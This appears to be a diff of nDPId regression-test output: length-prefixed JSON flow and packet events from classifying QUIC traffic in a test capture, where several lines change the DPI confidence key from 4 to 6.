00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433067996,"flow_last_seen":1621433067996,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433067996,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"87.179.155.149","src_port":49689,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02304{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1621433067996,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433067996,"pkt":"AAAAAAAAAAcAWlu1CABFAAVi1TJAAEARrlvAqP4LV7OblcIZAbsFTjBdyP8AAB0IGttMWxhOAgQAAEU0E0iR2uQV7+gKMUMCJ94a1mUs9WxU6Tkmya1QT1ijZpDLW3h0qsyJnE7yi5XMKbMLZQG0VI0E4CnL4699UzuXHbmZG4j1bpQxuVn5yALot0dTMdquwfkg43GEM1wkpQgrsMTP0qTEcaLbJ4i4VFKwOqxnROj3ts8Q5YEHHDel6ycIKIRhevOZCj2WbWLu59h+nwbW8hRv73Od8cN4+kjzfuGe+B1zZiO+ZdX3XLy2RMy5S4kzUgTJnM6eihuCfOyH9C1kMvBrE6eF+uvUY6g2SL73pAnMQ8F3ZxMjAvnHhyJJDNucS6II1cpdPCb4Nk6lW166dZJrTlpxEptf9MOeoGPoI7T8kuqmrwllZaRI4XQ\/kKSxUPBWGaQQMJydqLl6\/T1lDk6eOI6jqnm\/GdP90hCcoCmDPrWgZe22++LHPGXmbsr3YOCDa1nIhq8ftKY33OkoptIbA8RVngOr1lQUcMQQ\/VYFKWd7j8gKOuzuJU4SGqvnkK6Wj6e+C85olkBIqr+FP9UVpBEPptprLjMH\/pqncDJZ5yEh7Grdurgenn8Oa1UCeREsY9XCcMK5LJG0GEGg5FgT1KKRue2Z3g1vuP3LjKlHlZ6ysoHZipHIwWeDZcFGaN8c7Ipp75Aj4UWNvtREE2z3pxKUeu\/3ZyZ1sgWETUpVlXcSVvotMQ5TZwvAGbXANNu\/rhz1tvjUpV2Gbr3iMVknJ312hfpRnkJ0phBBW7yPgZMi2pP2LGIwP70mvVJhdiKKMoWgQ2K6uSPzHShiYyWZ9wfqSuCt4GrPH2Dz+sYRk9GjWlWo38XlQSZByhfvHyMDGY\/VwkRy7DGiQWpLBPaI32qcs+0Wi5UhL0chKc9MuYtE2kBrFhu\/MmzxgILiKu9g1WiLecrRs+SiPafnawwXaxRH3UnKyKEbs9tf7cxaGwTFwQbItBr0May5hHbw7VijZr\/F9HknAkXN+WQzfw2IZkbx63CHzTxn0Lf0\/gAteNoZtUoQnGHEWYD7yIoAOl+XtxktZ2WH8ilBnJI532y+PhOHWg7vFNIZYy2XNI7Ro8rUoGLA7ZyBrhYAPGV\/NOjp8U6D1metWriDzDxh0ozJasZzk0JYSqpovUTh5xgdlDtecRDUNdlTAfjBnyMbf+cFYTPnowHg7\/FY4RR3Q6\/UygV+NcMVkjaTNaDNXvagiuVZXLNIb4Tk3A2V3EqgUkxJl3ru+va\/80OsxasM4dazYUBuVN1MBNdZhpkRBKIit9QjLPAJB6wcXxf+0p+d0gN55St3hQi8gb\/iL9k\/onbQhxFP89onbtuDFXRyUSTM8tQq5CBj7L4VyNmcLHxtw5p3RXU70Uk+0psZnI2HJXq3ccqQUlNOGe4V57sFTrkyJUpugmAdJl2lStMmlzn5NM6S8FjEz0Mv23EdQvL2Xv8xQtAJ82kaQeAQu+skCfiHwl2eE0HR0kpuVdYzC4577xLkjxLKoUO64A52BANzmrvYZyO1d0UbSchYHinUiE32BfXi+lFE2EkQL8c4oFSQkavwjhteXk5z9herUfnERT404lCm6CiO4Z5gG+k6w2kpWoipnHtRYOjO897tsBk6rLYOHvEuLqjnZuhXbn3m7joNX5Nd\/3Q65iq8R5w3zlVfzVIw6SZdhLY9l5ctDa9JFYiC9MK\/ietRcrprlPxUIwhQEDdSRUda3EJD\/9M9hmP+CaD+tbS38jpu\/LbnTrforILNg1cv1A+sXeT03E966mAsy1Ec1mrv8LqFR9Ep7nyOUg5\/wWMujj7+qgzOoMXZ"} -00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433067996,"flow_last_seen":1621433067996,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433067996,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"87.179.155.149","src_port":49689,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"dev Chrome\/92.0.4503.0 Android 10; SM-A125F","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} -00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":56,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432876694,"flow_last_seen":1621432876694,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433067996,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"251.236.18.198","src_port":59048,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433067996,"flow_last_seen":1621433067996,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433067996,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"87.179.155.149","src_port":49689,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"dev Chrome\/92.0.4503.0 Android 10; SM-A125F","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":56,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432876694,"flow_last_seen":1621432876694,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433067996,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"251.236.18.198","src_port":59048,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433096272,"flow_last_seen":1621433096272,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433096272,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":62818,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02317{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1621433096272,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433096272,"pkt":"AAAAAAAAAAEAWIVLCABFAAVi+xxAAH4RF+uokEAFcfqJ8\/ViAbsFTmV5zf8AAB0InVNfXfhBloQANwAYYxPxefYKsSfYBnNv1ogsVtvxp+5D0ZV\/hOY9nIpSROAI1ZGm2\/N1AX52ghSODygwpwixzphE\/Zx4PU\/J05Jihihf0HSLIm8bvq1I4lsCPEN84oOzz93N2RNW4AsTQ126TJRbLg+\/OXaDSNcEv\/431bFF8tgqRZ\/fSgX8JysNc3KPA0qWL2Lk3BVQJPsXIJEu279PpzYHBZ9j8jr+MI6zCBxYsOIqbCcGrJg7V4pGpqZanmc\/ej\/n3DeFkX7FR0rIL4URy2ACi55eZKyE\/cY\/+hGES0KNpvEuqZP0W6JB1GsnUf4nno1645JeNNQ40sWdwbJM93i20DxzCA2IHAqqDjKl7kwPdqZgyd9wwmr9W5oFXYYoiVP9fx50w\/y3HwF4y+xHmrmGKykORvvBujXyroRnjwvJp9k2q78bX9Nyvlbb\/fcJY8pdAcKGU9z25xdLJSOP1tG+gXR\/jGu2H6rUhavGMF5LYRTLRLHp4SbpUUx8jxdCEFUjmqtpUIEIrwm4Z0Hm+uQms\/iJ5w+1UJ2sdLBPKH3CMuMfmQi9NKErYIIwBEWNGQPZhSqFzVRVxsUINfKxs3IjvTnnhraOla+6OE4l1QrgjctRAPGA7S62BByhCMQNGtxvd0byLHL3+HLvfrJ4IQWU+re9yL28JxErUWHasznlYJkI6xctz4\/QfwLD\/upI1HHH3su\/JN\/59+8xaxpgdcd1l2nQp0pyvwyv5U6Wf7RnFfTWkvsE+beNCGvmyezggTvYYVlP3svh2dMR5YCsXGGBkHXD5Al\/bACbEjho74CZPIoyoqlumxFrHIJzc\/NBVqNAjx6GAMbtTyTT9DzAEk0LjnqNCPGHCefcqhja9+\/J1dYX96nmT25GaBsEaG\/rC+3NobsSNBEJakiA8NJIkUAtNh+7e+Q1zXrNjmd8NmSHehchWFhaFYfxnUhrfl0EpT63dRGyufStUHX8IH1M1xkDQCR7MdusL0d8DxstPAiU60cVG6Pwo2zDUTo5ubMxGhOpDHV7R7afYETZMCRo7m4ZNNCrUpt7zoBwup1J4svPg6nbVaI\/m0yq18JHw6AXXYyRID8HHMYm7BT25H0nPZW9IjpdJr3qmbDzc+C1RUeG2FZX3vtkbX1cww+TdfceaPdnmlb8oqte+bT7ih1pGpJbAr5QrtlJ0fJxJALGxPwvaxQt9OZJtzlgIiab41SJVcAVCq2GsiZ42wdCT81IxlQVTSKbH4rfxWIpBOQ2K2fcx5t+Zp\/ZWzBzNSCJHZYT0Yrw\/F\/i5MpM8YmdTShwy7McxVy34xfaZsuGyshTN0NhE1oUwb89fh0YTKyYiGlurNDOZOnGgfEY3re1o6jZ1GhwQ9qS8pljPV8ic6OmyGN3uNl6cnbAJr6m2SeP9AyqqSk1xq6k+NfhHQoeQ0khsYt2zSVuVeE30pVDMVLVpm1OQ7GuqKpKfrgPTEqSQp7+KiYJBgE45ORKunQOL\/cPFO2l8yzljsHT\/3TEL5kTELmyqZtHoUk5kaVnTC2KnmjMSJdqOCe0YoI+ZYBNkv2Qc1l\/Ve5vnSTtpVXPgZSSESjNxCDjPN5u2\/Z4VbQPVJvn\/cvLnv37v4aofPgYXBuu4ppOjhOv+b1CVIy9SClF\/HoAy6eQYGuQjl4dTmHCm2hwqRIzd1UwyH0AmPA5vcXUv8JLzDIYLi6t8TV9fYAP5GDkBiAsP8JBZRXqxfCVEsg4I5l0rc9K50VAdnoSCYqi+WwH8w7xNF4Bf7\/E3sWph1xGreEe2sTWhSoHxGuzKZgP"} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433096272,"flow_last_seen":1621433096272,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433096272,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":62818,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} -00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432905490,"flow_last_seen":1621432905490,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433096272,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"170.196.90.126","src_port":45652,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} -00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432905483,"flow_last_seen":1621432905483,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433096272,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"93.100.151.221","src_port":38331,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DataSaver","breed":"Fun","category":"Web"}} -00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432907578,"flow_last_seen":1621432907578,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433096272,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"98.251.203.81","src_port":43427,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433096272,"flow_last_seen":1621433096272,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433096272,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":62818,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432905490,"flow_last_seen":1621432905490,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433096272,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"170.196.90.126","src_port":45652,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432905483,"flow_last_seen":1621432905483,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433096272,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"93.100.151.221","src_port":38331,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DataSaver","breed":"Fun","category":"Web"}} +00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432907578,"flow_last_seen":1621432907578,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433096272,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"98.251.203.81","src_port":43427,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433110371,"flow_last_seen":1621433110371,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433110371,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"125.136.204.4","src_port":56425,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02309{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1621433110371,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433110371,"pkt":"AAAAAAAAAAEAdQOrCABFAAViTQVAAH4ReGOokEAFfYjMBNxpAbsFTiPgxP8AAB0I64b6Iq3qYnUAAEU0uyXOGSdM2M9jQQTW8DsUXfqiyZuXJRO+q4Qmsi3Ls5Qr7HY2TrDXBUTOIVmmAHBRjS4fP4\/iytOosBigAE3GS1YbHzV4KTpsNSP39e4Ai\/gNwa+JW6iG+pMEbrvqFzobrQPLaW\/LHhGgdXr9HPIyoZkTeqm4dAslx2tKgtIx+D3ADPfxa1GtgUwgxIFKeLXE5L28gvidFJ5kvOUtEWVi7p1Ct04FJCqOfcTDqWyHNK+CqUqUXBJaar8gIYJl7Adtmv4APrH1W4DdFGHseDk\/eiFm5dmfQmCqHSHBPKfjlASsF\/vx\/dDIlMGRNJVvEUORDhpGyc6KzrwpCkBycpnvcDHT9PXlK1Pxbvka1u8Bb\/RRdl4GhJjum02FvwJAQzMMcjvQQIBXXUnCtqFNSpD+x2LT6UXB+SZ7qVGMl\/t0sECBNEK08pUkCk0VFUho606M2fHuj9LbnZQ2bGNrvbAjmEkMviJQv1BoTAZGNESQTqDEbwUZYlY30qwlBFXqT9WdH2E9DjbH42c0gLLqSkQErQpcDnv3SSVrUT94EWqqkCfDVWO57NKjDmHa\/9gsGDeQQUO53mruFkMe6rXxUCFdLDVpieBe\/WbmjFIiYjT+b4FzvV0xGUDAY6PtgiB6HvKPqKp6fxy1kpVrc+ZsH0+HKMh3jfC1EeH9CHXsXnCW1rsQpJK4+n8CsldKtQaVDkSAqWG\/OgV+UysKdCujrfyCGHfNMSPWkslqqg7s2vLXqrQBO58gohSxIbtaCIYfWJrle40Mot6V+cL54Ya7PHlWtQH\/Ful4v4rOlvCR9PDd2nGpQ3FkgkGPeywwCdeY5sCTYbMMlVuLQJ1oFmyS3u\/zhwjeifqZs579qwIfpeaP1FtY5r+JU0rDJQFD7jOZdftjZf2LgOsGj\/TW2xmygvRQ30KJn7bLRU1w2J0q7tz5rXSOHzMeKm57vqp3aJSFv9vTNxJ+BD5u\/xLLqLMMeKd3yPZj737pE79\/LtTTjm5eJ8jsSmmJueqzLtGilfbTFryRQF8325++2yfVJKrzj0c61X3njJbMRbXWJEiQmoEZWV9TWfn7wTSpOjjQRnHFofPS0wy5fqr\/79EqOgnhI9PoQuUw+VgWrmM8UnMpt6HX7llwMkswjZvYYBxWiZK7SxCUZWVinS8leBxtyiCVvDCRWP+lpTzYWOppDeOpuuR6nJmZFaaTGLcFFPeAKuAVu+nTC0hkldleZKShVNc+\/+rolf\/Gxsw5EKidbPL8HFlBJjaenmfkmZBH3LxN7+OOgk0dXGhmlJ4wgJ21FhusAxJjb4rdo8Ob65\/i1ZqK2DnqWoWzDwD5m4Uu8\/nBbSMW0kQrvJmBY4XN+lhGiBPJsJk96AxOW048eDZfKJYg8Q4WotwapShO9Tb4n7Q5LhKow3wsQkO4tfue14G\/HUzOIzbT2Vd6GbyzGYbP6zeXYMvI\/MobQkwBtMUX8uK0OxAv1Dxr6E1ez++cFwnP4qZm\/N5d3Snzx7Qd6PHVVvdaIKFS5ChMsrskm71TFLKy4FJm65hgjBVyTzsB5o+U2Jtrwl04IuRnmQXivp3vavvqqU\/4e3mekp37TSUP7JrzfA2\/tdw5ycfdyqXP74qiJ7FqCBDCIFZz07WOMSykwdBK8sEwapJgncvO5v8s3K9sHSmwHnUhAmcTcEJWDFYrq8fgJAuluMgxicHkbBHDHTdVhPiEDPwopOcYRyFx6QlMlyoiPrV8enJOOqMFw9m6sR5PA1xxKZEflyuJ3mRTH80kEIdfZNby15\/d"} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433110371,"flow_last_seen":1621433110371,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433110371,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"125.136.204.4","src_port":56425,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r1---sn-vh5ouxa-hjuk.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} -00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":58,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432925103,"flow_last_seen":1621432925103,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433110371,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"171.182.169.23","src_port":54692,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433110371,"flow_last_seen":1621433110371,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433110371,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"125.136.204.4","src_port":56425,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r1---sn-vh5ouxa-hjuk.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":58,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432925103,"flow_last_seen":1621432925103,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433110371,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"171.182.169.23","src_port":54692,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 00602{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":58,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":58,"packets-processed":57,"total-skipped-flows":0,"total-l4-payload-len":76950,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":45,"total-detection-updates":0,"total-updates":0,"current-active-flows":5,"total-active-flows":45,"total-idle-flows":40,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":193,"global_ts_msec":1621433283660} 00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433283660,"flow_last_seen":1621433283660,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433283660,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":59622,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 